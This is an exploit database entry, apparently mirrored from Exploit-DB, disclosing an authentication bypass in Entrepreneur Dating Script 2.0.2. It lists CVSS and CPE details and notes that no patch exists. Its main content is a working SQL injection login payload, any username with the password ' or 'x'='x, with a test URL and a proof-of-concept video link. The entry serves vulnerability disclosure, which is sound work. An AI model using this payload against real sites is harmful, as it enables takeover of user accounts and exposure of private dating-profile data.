header-logo
Suggest Exploit
vendor:
Entrepreneur Dating Script
by:
Borna nematzadeh (L0RD)
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Entrepreneur Dating Script
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:entrepreneur_dating_script:2.0.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Entrepreneur Dating Script 2.0.2 – Authentication Bypass

With this exploit, attacker can login as any user without any authentication. To exploit, attacker must go to the login page and enter any username and ' or 'x'='x as the password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly validated.
Source

Exploit-DB raw data:

# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any authentication.
# # # # #
# Proof of Concept :

# 1) First go to login page .

# 2) Username : anything , Password : ' or 'x'='x

PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html

Test : http://server/login.php?lerr

Navigation

Suggest Exploit

Services By CQR